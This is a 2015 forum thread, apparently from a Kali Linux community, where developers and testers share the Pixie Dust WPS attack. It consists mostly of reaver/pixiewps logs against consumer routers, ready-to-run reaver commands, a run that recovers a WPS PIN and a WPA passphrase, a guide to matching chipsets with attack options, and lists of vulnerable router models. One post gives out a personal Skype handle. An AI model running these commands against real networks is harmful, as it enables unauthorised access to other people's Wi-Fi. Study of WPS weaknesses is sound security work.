[P] PKR: 1d:4d:69:d6:76:ac:8d:6f:9e:d7:7a:3a:4a:0b:d7:38:91:fe:e4:76:99:dc:de:95:70:0f:76:8e:cf:f0:ae:9d:61:21:2e:9e:a2:49:a6:38:ce:84:bf:8c:24:d1:6e:67:27:9c:8c:5f:14:0b:80:f2:52:aa:81:ed:f9:b7:c4:93:4e:fb:c7:6c:fd:16:5d:81:d8:5d:73:c2:72:1f:9d:54:3d:a0:33:cc:83:61:e1:22:9c:4a:8d:61:d1:19:87:78:7c:ea:0e:83:1f:33:bc:a4:07:e2:a0:0a:ad:69:6b:e8:13:ca:6f:0d:d6:c5:6c:0f:0d:03:b2:4b:7c:77:22:30:c6:60:70:2d:9a:c6:fb:dc:fc:ac:6a:83:60:a0:78:e2:65:c1:53:e7:d3:c6:0c:14:75:98:83:ec:c4:6b:ff:ad:c3:4f:bc:87:d4:27:d5:6c:6d:77:d0:c6:9f:10:1d:46:54:94:6a:9e:8a:47:f0:2a:f9:e3:49:e0:93:a3:cf:99
[P] AuthKey: e0:9a:70:98:e9:02:e6:35:de:9f:51:76:8a:bb:79:5d:c2:7e:86:55:bf:bb:ad:d6:c1:59:f6:72:ea:e1:eb:66
[+] Sending M2 message
[P] E-Hash1: d5:ae:2b:a4:98:12:42:08:3a:0e:7a:a2:20:b0:38:c2:92:cc:d2:89:e1:e5:d2:06:26:78:94:bd:7d:d2:70:8a
[P] E-Hash2: f5:92:52:dc:5a:67:0a:d6:c7:b4:86:b6:7b:72:19:c9:42:f7:6f:47:cc:38:5b:3c:b5:25:74:1a:43:99:75:0c
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 1 s
[Pixie-Dust]
Code:
XX:XX:XX:XX:XX:XX|11|-51|1.0|No |TP-LINK_48FD412| TP-LINK| 12345690
OUI: 00-10-18 (Broadcom)
Device Name: TD-W8960N
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 5a:07:59:bb:b9:6a:14:bf:3a:ed:0b:50:5b:2d:8d:d2
[P] PKE: 7f:1f:e6:78:73:18:20:fc:f8:a4:1c:dd:b6:6f:2f:a4:fb:19:2e:45:45:9a:3c:21:4b:ca:b3:ef:74:25:af:c2:a5:77:f0:da:a6:bc:7b:30:9a:24:36:d6:8c:e6:70:dd:fc:3f:53:2d:ba:f5:35:97:5c:04:c8:96:a7:37:f5:c7:0a:3d:40:74:c5:18:c3:a3:6a:c0:bb:92:e2:98:85:79:46:51:e5:01:0f:fc:9f:3f:70:42:9f:6c:4f:3f:8f:58:bb:2f:b8:48:e5:41:64:82:ea:49:c5:80:8b:60:71:0c:31:e8:d6:30:5a:d7:e5:f8:60:02:e0:9b:c8:e0:19:5b:23:61:ff:8f:47:5d:e2:94:9f:20:a2:5e:3d:25:6d:4f:6f:93:9b:32:c9:b4:12:4b:a9:7f:80:69:f8:48:8c:eb:a3:5d:25:94:3f:19:67:91:e1:96:aa:1e:1b:49:37:46:45:39:6a:a2:17:db:7a:1c:6b:34:94:db:64:bd:f5:18
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 123456
[P] WPS Model Serial Number: 1234
[+] Received M1 message
[P] PKR: 95:2b:f1:10:06:77:c0:86:a1:ed:4e:72:1b:86:ab:a0:0f:0f:cd:53:36:31:8f:6b:7e:24:15:19:15:6e:b5:35:c3:f8:8b:0c:11:52:59:79:70:0c:20:5d:36:ca:8a:49:a7:28:19:55:71:c3:69:a5:49:b9:f5:6c:8a:6b:91:6f:79:a3:35:77:59:86:2e:8b:92:f6:d6:e2:b1:c5:72:c9:bd:96:8e:55:5c:48:c5:9c:71:68:77:1f:2e:d0:79:f1:46:c3:f6:98:5c:32:a8:01:f2:f4:71:d3:52:82:67:0c:85:58:b5:eb:f5:5d:a0:61:47:b3:91:1b:b8:1c:2f:b8:90:b3:ec:cd:9c:28:f3:1f:26:d0:5a:7e:1d:65:ca:f0:d1:1d:e2:ce:a3:9a:02:65:8d:15:85:07:30:20:dc:d3:6c:04:de:a4:23:b3:ec:72:bc:13:a6:60:cd:d0:72:98:fd:53:35:ff:6e:d5:6c:60:45:ba:75:7a:3c:ff:a0:4e
[P] AuthKey: 96:60:ce:20:f5:dd:07:56:0c:71:21:e7:bf:6a:34:5b:97:4c:2a:80:23:bf:48:5b:d5:28:cf:51:2d:32:a6:0b
[+] Sending M2 message
[P] E-Hash1: d6:b8:56:b3:22:cb:8e:b1:15:c6:3c:b8:a4:21:99:4c:ff:a2:fb:88:d7:47:21:73:3f:2b:0c:fd:92:be:92:5a
[P] E-Hash2: 96:bc:4e:e2:e1:14:a5:ea:8e:a3:65:03:66:f0:ef:d6:6f:ea:c9:9c:ee:60:07:dc:be:e0:63:c2:67:1c:8d:ea
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 1 s
[Pixie-Dust]
Billion 7800N Vulnerable
XX:XX:XX:XX:XX:XX| 1|-40|1.0|No |Corona| http://www.billion.com.au| 1.0
OUI: 00-0c-43 (RalinkTe)
RT2880iNIC
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 4b:65:ca:9d:f1:f3:8c:76:3a:ab:b7:42:8a:92:2f:b5
[P] PKE: fd:a7:c9:c0:d9:4c:7e:fd:24:ea:5a:ec:64:e2:f1:d5:aa :f6:75:e8:f8:7f:70:a3:e9:97:5f:6c:a3:92:60:42:34:d c:ae:63:d1:ef:99:61:26:46:23:aa:26:95:61:4a:df:91: 63:f9:77:fe:0e:a6:17:d2:2e:d1:39:27:d2:78:03:50:8f :06:7b:74:c6:08:af:11:0b:17:4e:75:db:52:b9:56:40:3 8:90:6a:d2:c0:69:af:d3:22:9e:45:b2:f3:fe:6f:b2:74: 2b:c3:93:b3:e6:9d:74:57:5f:f0:7a:0d:ad:34:0d:47:b7 :72:2b:5d:0d:b2:d1:7b:d3:6e:24:a8:dc:f8:e1:84:f8:a 8:65:bf:96:5a:7c:ee:4e:3e:09:80:c4:c1:07:92:1a:06: 83:bb:f2:64:e3:f9:06:39:b5:c3:23:9c:7a:4f:a3:56:3a :2c:56:83:1b:fe:c2:da:35:69:06:45:d4:5a:f1:6e:25:2 4:86:f2:db:3b:0a:0a:b7:21
[P] WPS Manufacturer: http://www.billion.com.au
[P] WPS Model Number: 1.0
[P] WPS Model Serial Number: 12345678
[+] Received M1 message
[P] PKR: a7:b1:8c:7c:db:7e:28:fb:8a:27:9f:e9:ff:93:12:9d:ae :6b:89:ea:65:54:c2:2b:a2:0a:7b:d7:ee:57:ec:76:71:f 5:5f:32:a4:94:ce:53:82:0c:9e:95:e7:e7:69:18:da:0d: f0:f2:ec:ba:b3:bd:21:bc:d3:98:ac:86:e8:1a:b3:09:e7 :db:23:e3:ed:e2:d6:e7:ec:aa:da:53:45:60:78:98:78:7 d:0d:09:5b:58:32:1b:8a:3a:96:b9:52:b0:0c:e3:ec:ee: db:92:cf:bf:0f:87:d5:84:ce:3a:73:28:a4:90:99:f5:3c :67:c6:1e:9c:06:35:fa:07:ed:15:f5:a1:fe:29:b3:ab:e d:50:86:74:30:11:97:a6:17:e7:5e:f7:72:1f:4f:bf:30: 20:43:0f:bc:88:53:1a:fc:e0:db:96:3a:f6:66:1d:d1:31 :c7:4a:44:a1:f1:d5:05:a0:80:c7:22:bd:29:e0:ed:b8:d d:80:be:70:ea:ff:a4:3c:47
[P] AuthKey: 4c:23:09:ed:5f:b8:15:15:1e:61:b6:99:46:53:d7:2b:9c :85:13:28:80:55:b7:b5:e5:6e:bd:cc:35:99:c5:85
[+] Sending M2 message
[P] E-Hash1: e6:87:2c:1f:b0:60:de:3f:65:8a:4b:02:30:36:1e:da:b3 :0e:58:ee:54:db:bc:d0:72:61:55:de:39:5f:a9:bb
[P] E-Hash2: e8:c0:54:54:fa:f8:e1:ef:ad:ed:5b:90:81:60:af:6f:53 :c5:74:2d:ba:aa:6c:28:28:e6:a5:fa:8c:78:fe:ec
[Pixie-Dust]
[Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] PSK1: 91:5a:dd:fd:ef:ce:21:83:97:a9:13:ef:ed:94:5a:cf
[Pixie-Dust][*] PSK2: 91:e6:ab:f1:08:66:bf:56:3e:df:3a:df:67:5a:de:90
[Pixie-Dust] [+] WPS pin: 48606684
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 0 s
[Pixie-Dust]
Running reaver with the correct pin, wait ...
Cmd : reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c 1 -s y -p 48606684
[Reaver Test] BSSID: XX:XX:XX:XX:XX:XX
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '48606684'
[Reaver Test] [+] WPA PSK: 'Routersecurityflawed'
[Reaver Test] [+] AP SSID: 'Corona'
Excellent work on the mods to reaver and the pixie wps
Cheers
Extra
The Realtek implementation is unfinished as of right now, 4/17/15. It ONLY works if the entire WPS exchange occurs within 1 second (here, E-S1 = E-S2 = E-Nonce). Wiire is currently working on the PRNG brute force and it shouldn't be too long before it is finished. In the meantime, I suggest you wait and don't try to attack it again so you don't get locked out. If you want, you can send me all the keys/info and I'll look into it more.
Last edited by soxrok2212; 2015-04-18 at 01:12.
Very, very, very nice work guys, guess there's no stopping progress. :-)
Would anyone mind if I added the pixie dust attack into FrankenScript?.
I hope the following output of the tests of 3 routers is useful:
root@kali64:~# reaver -i mon0 -b 5C9:98:33:xx:xx -vv -K 1
Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>
mod by DataHead
Option (-K 1) or (-K 2) must use the -S option. -S Option enabled now, continuing.
[+] Waiting for beacon from 5C9:98:33:xx:xx
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Associated with 5C9:98:33:xx:xx (ESSID: xxxxxxxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: fc:09:f4:f8:14:f7:d8:6a:e0:1f:45:af:39:c7:0f:ad
[P] PKE: 85:84:7e:84:11:31:2e:77:e4:1b:da:ca:e5:be:c5:7f:1f :66:b5:e8:5f:21:f9:54:87:4f:49:ab:f4:bf:2d:93:e8:1 f:f3:92:de:d5:96:0f:98:25:e5:dd:74:d5:5a:ad:85:cc: 5a:f1:9d:c3:17:02:26:89:30:50:b4:e3:43:52:51:56:27 :7a:22:c2:a2:6d:ba:4c:c5:01:2d:ca:0c:21:ac:4c:94:1 2:27:aa:d1:3d:7c:49:bc:26:46:ac:c6:d6:e4:34:50:7c: 91:fd:25:fd:30:07:09:8d:88:5f:46:b8:ed:1e:99:70:42 :1b:29:31:7c:75:9c:56:4a:75:ee:3e:2d:0e:b1:45:e0:1 a:c7:e5:b4:e7:f8:88:bf:ae:87:2e:49:10:92:06:17:94: 49:c0:5d:4c:17:87:79:4c:c8:de:01:b0:0b:24:fb:2d:bd :4c:cb:80:99:7d:b4:d4:fa:af:38:8d:92:b2:77:ac:0d:6 9:9d:58:dc:a9:31:08:98:da
[P] WPS Manufacturer: D-Link
[P] WPS Model Number: DIR-615
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
[P] AuthKey: 9a:86:3f:ff:71:8d:9d:e6:53:e3:a9:d7:e0:f8:95:cf:74 :0e:7e:88:32:67:c9:d1:87:2a:6b:e3:5a:17:88:4e
[+] Sending M2 message
[P] E-Hash1: 31:a7:13:e2:68:e4:4a:6f:af:c7:04:08:6e:5d:93:62:21 :b9:8e:a3:c3:31:47:d2:44:11:49:43:ef:ae:ac:c8
[P] E-Hash2: 3c:60:ee:50:64:40:4a:16:52:73:3f:2c:34:9b:6c:7e:47 :71:9a:bc:71:b6:96:a1:3c:9b:c9:bc:14:ce:6d:76
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 0 s
[Pixie-Dust]
root@kali64:~# reaver -i mon0 -b 40:16:7E:5D:xx:xx -vv -K 1
Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>
mod by DataHead
Option (-K 1) or (-K 2) must use the -S option. -S Option enabled now, continuing.
[+] Waiting for beacon from 40:16:7E:5D:xx:xx
[+] Switching mon0 to channel 1
[+] Associated with 40:16:7E:5D:xx:xx (ESSID: xxxxxxxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c3:b1:c2:3b:2a:5f:f3:35:83:c4:d2:68:16:64:d9:76
[P] PKE: ae:90:dd:03:c2:b4:b0:7f:17:5d:c9:cf:3a:d8:6b:ca:1f :24:08:20:55:a8:73:65:6f:61:b7:a3:a8:2c:00:58:fb:d 0:3d:bc:35:a6:f6:10:fc:d2:c1:70:1c:9d:5f:af:d6:ed: 3f:ab:38:ff:86:9d:f7:84:6f:22:3b:cf:1e:9f:bf:cc:a1 :74:07:a1:69:7c:71:75:4e:cf:10:d6:34:d8:3a:b4:07:5 8:50:95:70:73:53:0e:c3:0f:de:34:7d:51:05:ad:74:82: 08:c6:04:ef:f9:42:a8:29:19:0c:68:64:63:ee:77:d8:50 :b6:fb:9e:7d:87:84:86:fe:78:6e:54:15:b6:32:3c:60:9 2:1c:aa:ce:49:a7:13:09:2b:ee:a8:4c:31:d3:09:b6:11: c4:16:32:c5:b9:9e:0d:65:89:96:f1:7f:37:2f:42:75:d2 :cf:50:b6:67:70:a7:1a:28:a8:d1:e8:4a:ec:a9:26:9f:b 7:c8:ea:78:9f:ad:e3:06:a8
[P] WPS Manufacturer: ASUSTeK Computer Inc.
[P] WPS Model Number: RT-N12
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
[P] AuthKey: 8d:9c:e2:47:23:ac:b2:d1:f6:de:cd:d5:c1:d3:3f:41:13 :a4:e7:5c:20:3b:24:7c:f2:1a:4b:19:6f:ca:68:3b
[+] Sending M2 message
[P] E-Hash1: 6b:0f:9b:cd:c8:0e:92:78:13:6f:b8:01:f1:45:0c:3d:99 :88:60:1d:5d:69:6e:e6:55:da:44:a1:d9:61:1f:52
[P] E-Hash2: 0c:16:eb:80:24:18:f5:1a:7d:c3:11:ba:c4:1c:e6:d6:56 :81:31:c3:76:6a:52:1c:4a:c6:5e:ad:0c:51:19:7b
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 0 s
[Pixie-Dust]
root@kali64:~# reaver -i mon0 -b 64:70:02:5C:xx:xx -vv -K 1
Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>
mod by DataHead
Option (-K 1) or (-K 2) must use the -S option. -S Option enabled now, continuing.
[?] Restore previous session for 64:70:02:5C:xx:xx? [n/Y] n
[+] Associated with 64:70:02:5C:xx:xx (ESSID: xxxxxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: bf:1e:7d:b5:18:9e:f0:66:22:9c:5e:20:2e:43:31:6c
[P] PKE: 9d:48:eb:a8:25:6e:6b:7d:aa:f5:b9:f2:da:49:66:b9:cd:8f:b1:ab:25:16:ba:7b:df:87:71:7e:d1:e8:af:b1:71:ba:c4:96:89:d8:db:1b:57:2c:61:cc:0e:a4:c6:31:02:38:43:50:d1:be:b1:83:49:19:3e:8c:ed:9f:55:e5:6e:a7:1a:05:c5:5f:22:e0:c4:ac:d5:5d:d6:bd:32:a8:1d:e2:6f:25:78:e6:9a:4d:55:f1:7b:dd:ba:ed:13:7f:33:a6:76:38:af:c2:b5:d6:10:42:eb:98:4e:f6:fe:90:dd:4d:79:d6:08:d7:3a:0c:86:11:4d:b5:75:76:d7:4c:48:a3:00:33:97:2c:b5:57:a3:83:1a:5c:58:94:78:53:cf:58:54:c2:1f:fa:ec:91:06:84:d9:95:2a:38:31:72:a2:cc:17:63:a0:13:a0:9e:7d:cf:cd:14:dd:07:82:76:2c:76:7d:2d:e2:fd:4a:d9:a2:f4:b0:b1:fc:80:18:b1
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 1.0
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
[P] AuthKey: 08:a0:73:06:7c:1c:bf:77:d9:04:a5:14:90:8f:b6:5d:4b:d7:f5:06:7a:8d:f4:e0:25:88:ae:70:07:d8:f4:82
[+] Sending M2 message
[P] E-Hash1: 2d:55:4e:4a:17:6a:87:ac:33:ae:e4:be:f8:3c:94:f0:d9:ee:fd:5c:a6:a8:af:96:20:8a:07:e7:5d:cd:cd:35
[P] E-Hash2: 11:f1:24:8c:37:54:fd:3c:5b:f3:b5:66:df:6a:58:e9:9c:f4:2c:9d:d5:ab:4e:36:89:bc:d8:27:9c:ac:15:7d
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 0 s
[Pixie-Dust]
We would like, please, if possible, a method to add more routers. Thanks @soxrok2212
Just so you know, -K 1,2,3... Each number is for a different chipset. You have to look up which chipset the router uses and then use the corresponding -K 1,2,3 argument.
soxrok2212, thanks for your work, but on the routers TD5130 and TG589 V3 it doesn't work, and we want the method you are using to add routers to pixiewps.
@ Quest
I heard your call matey, Guess I'll be adding it to FrankenScript. :-)
Last edited by slim76; 2015-04-18 at 12:28.
Yeah, I just sent a message to t6_x, I think we will be removing those options to make it much simpler. I don't really understand it right now either but I guess I can try...
1 should be used with Ralink and -S used in reaver
Code:The -K option 1 runs pixiewps without PKR and the e-s1 = e-s2 = 0
The -K option 2 runs pixiewps without PKR and the e-s1 = e-s2 = 0 but using the -n option of pixiewps (E-Nonce)
The -K option 3 runs pixiewps with PKE, PKR and the hash1 = hash2 = e-nonce
2 should be used with Broadcom and -S used in reaver
3 is for Realtek and -S is NOT used in reaver (realtek isn't finished yet... it has worked for me but other users report failures)
Yea. agreed. I suggested to t6_x this idea on his thread.
Just have reaver/pixie try all three attacks. The user just wants the pin/passphrase quickly and doesn't really care how. If the user really wants to know which attack the AP was vulnerable to, let him use --vvv.
@ Slim, great but don't move too quick, this is still in dev with improvements on the horizon, and the next Kali might be using different programs(?) like another Aircrack-ng https://bugs.kali.org/view.php?id=2219 for example. That might change a thing or two or maybe not.
Anyways good to see you back and a new Franken looming [thumb up emoticon here]
Yeah, to be honest, I'd wait another week or two at least. Doing A LOT of work and there are still a lot of bugs to be ironed out. Anyways, I was thinking about starting a giant group-dev chat on Skype...? It would make communication a lot faster and info could be shared much much quicker. If you want to add me, my Skype is robert.jor49. I'm already in contact with a few of you guys, but there's still a few of you who are not there.
I thought things would change a little, it shouldn't be much of an issue; worst case I'll have to rewrite the pixie attack in FrankenScript.
I'm hoping to upload a temporary version of FrankenScript within the next few days if all goes well.
Is it worth getting FrankenScript to print out the results of the pixie dust attacks with the Pin & Passphrase, or should it just print the Pin & Passphrase?
I just noticed something about the install of pixwps, the install directory is different for different install methods.
apt-get installs pixiewps to: usr/bin
make & make install installs pixiewps to: /usr/local/bin
Does anyone know if reaver-wps-fork-t6x & reaver from the kali repo will detect pixiewps in either/both locations?
Hello
This site is in German. I hope this site helps with DLINK and Speedport.
https://www.wardriving-forum.de/wiki...ardpasswörter
Some new Signatures (tested with all 4 possible pixiewps option-combinations)
NOT VULNERABLE:
Code:ASUS RT-N66U Broadcom BCM4706
[P] E-Nonce: 01:5a:54:01:c1:db:32:e5:2b:33:fd:bb:8c:9d:f0:9e
[P] PKE: 8c:09:51:62:1f:45:31:98:32:a0:fc:58:0e:d5:ed:36:86:c4:b5:ab:7c:8c:c7:30:67:40:a9:ff:e7:62:8f:9b:7d:1c:31:d4:95:96:ce:ea:5b:b3:43:ba:d2:f7:12:8d:8e:48:01:fd:8c:0c:12:17:53:e7:aa:29:9b:9a:06:31:4f:73:e5:78:cc:b8:7e:99:26:1d:be:db:cb:69:45:f3:19:21:df:ab:cd:91:b5:d7:94:7d:83:b9:9e:b8:b5:55:61:ac:c2:78:17:f5:92:01:d4:a6:ed:fe:82:2f:83:23:87:05:5d:69:18:97:9e:c6:6f:34:cb:02:e2:a0:51:d1:18:24:c3:cc:7c:d7:ab:80:93:95:b6:48:ea:92:53:5a:96:6a:f9:4d:3e:a5:07:6d:4f:6a:20:cd:bf:5b:e0:b5:dc:b2:f1:55:17:43:7b:2c:26:0a:d2:05:ba:3a:87:da:dd:63:5c:5d:27:f7:84:4d:47:4a:b2:59:6a:3e:43:9b
[P] PKR: ae:55:61:51:7b:8d:b4:33:40:4b:18:75:f2:28:2f:5b:eb:68:17:2e:c3:d6:2b:c0:6e:9e:67:fb:82:10:c5:36:d3:b3:86:77:09:bd:fd:5d:fe:7d:8d:29:1b:c2:81:65:9d:8e:f9:88:fa:a7:49:20:3e:f1:ae:61:d6:16:f8:02:53:40:d6:bc:07:f8:b4:93:39:33:e4:77:58:10:57:04:dd:2c:01:db:40:87:96:61:f8:42:61:97:95:2a:aa:64:d8:8a:98:f7:82:5c:f7:d6:db:04:f3:0c:b9:0b:b0:b2:ad:d7:92:92:b3:7c:30:fc:76:e2:f5:d7:76:73:54:7c:74:21:61:db:91:53:94:f7:f4:24:4c:5d:f5:8c:7f:e3:4e:5d:5f:36:79:bb:a7:37:ac:6c:66:c5:b4:84:bd:b1:66:1f:eb:94:96:e7:6e:18:a3:1e:64:b5:df:4c:7e:ef:44:30:a1:08:f3:7e:59:df:38:d1:2b:71:d4:3e:3e:cc
[P] AuthKey: 0f:7f:32:3f:65:e4:3d:8d:b2:35:2d:a1:12:e7:3b:3c:f6:65:44:8e:13:16:85:e5:8e:14:82:83:66:7b:48:d2
[P] E-Hash1: 8d:53:7e:3c:cf:24:16:77:c6:6e:f4:09:dc:b7:18:44:a3:19:98:e8:c5:ce:5a:ed:b2:70:db:55:b5:ab:6e:b4
[P] E-Hash2: 28:29:96:3e:0e:33:87:0a:a4:90:17:9d:97:3a:10:7a:6b:f3:44:52:5f:2f:a6:8c:3b:23:96:19:c5:b5:e8:94
Code:NETGEAR WN3100RP (WiFi-Repeater)
[P] E-Nonce: ad:d5:5c:93:e2:e9:c1:59:87:ad:27:13:76:58:bf:32
[P] PKE: d0:0b:9a:f7:6d:aa:44:d9:7a:56:63:04:52:8b:39:e8:44:67:8b:99:3f:4c:70:b8:36:df:95:bf:3f:91:f7:89:37:c8:b2:1d:df:7b:43:0f:a6:06:99:a0:20:45:06:f9:ca:a6:be:f4:cc:e2:68:bf:c8:db:0e:75:b6:e4:a8:0a:ab:5a:3f:d2:29:08:39:84:0c:87:85:29:7f:e2:0f:86:53:05:c0:1a:35:fd:2d:40:c9:4d:00:41:8f:f4:9f:2b:48:71:3e:53:95:ac:ac:e6:97:68:a9:9f:11:f0:fb:2c:1b:4f:0f:24:e3:03:3a:f5:e9:94:10:99:aa:5e:6c:5f:2f:68:ef:02:77:7b:bf:0c:c1:05:bc:96:4d:d8:2b:1d:34:7e:b8:c7:a5:3c:2f:e4:31:40:60:24:98:5d:3f:0c:53:b1:1f:e3:53:76:31:90:b4:60:73:17:ae:8b:f9:1c:f9:33:d0:84:f8:cb:3c:ad:38:01:14:79:2d:bb:6e:90
[P] PKR: ab:a4:18:77:a4:9e:d8:05:e2:a3:bb:ae:b6:bf:06:a5:71:a9:02:78:8a:65:ba:76:15:ff:59:14:a3:49:f4:a0:c3:09:f1:fe:58:50:e1:da:7a:dc:fc:90:9f:4e:84:b6:dc:04:b9:50:ac:fe:a0:22:4e:64:7d:ec:d5:2d:cf:20:29:d9:37:48:8d:cc:4b:3e:2b:b8:3b:af:e6:77:c8:2c:f7:33:04:ef:48:61:3c:ba:93:ec:e0:31:61:80:4b:b4:c4:9d:6f:8b:7b:71:19:41:c8:8f:66:83:b3:26:dc:3f:0c:0d:e9:0a:ee:1e:1b:65:c3:67:c3:16:7c:16:1a:30:8b:bc:48:bb:ec:18:93:71:74:17:ef:3f:ea:ad:04:71:59:6b:2e:7d:ca:74:0a:0b:1a:73:5c:cd:14:08:e6:0a:07:40:dd:d1:ca:f3:cc:47:ad:93:cf:c6:67:8b:fa:25:b0:55:dc:22:5f:a0:32:60:60:96:dc:d0:a2:10:f9:71
[P] AuthKey: 9e:fe:ad:05:13:1c:67:c1:d4:fa:ab:70:03:92:b4:d2:b8:76:ad:85:f8:c8:39:b4:fb:fe:2d:aa:fc:ed:b0:d1
[P] E-Hash1: ae:a9:02:51:13:d3:56:4d:e8:1c:71:88:bf:ab:a7:71:90:08:3d:98:4f:47:1d:f7:40:39:e9:65:08:5d:05:aa
[P] E-Hash2: 45:01:86:0d:b0:2c:17:4a:32:2e:a0:d7:ca:8b:3d:ca:61:a6:eb:32:7c:2d:e5:aa:9e:4f:c4:3f:c3:de:e2:79
VULNERABLE:
Code:NETGEAR JNR3210 Realtek RTL8198
[P] E-Nonce: 34:5c:4d:63:39:13:1f:67:75:51:78:8b:70:67:6e:46
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
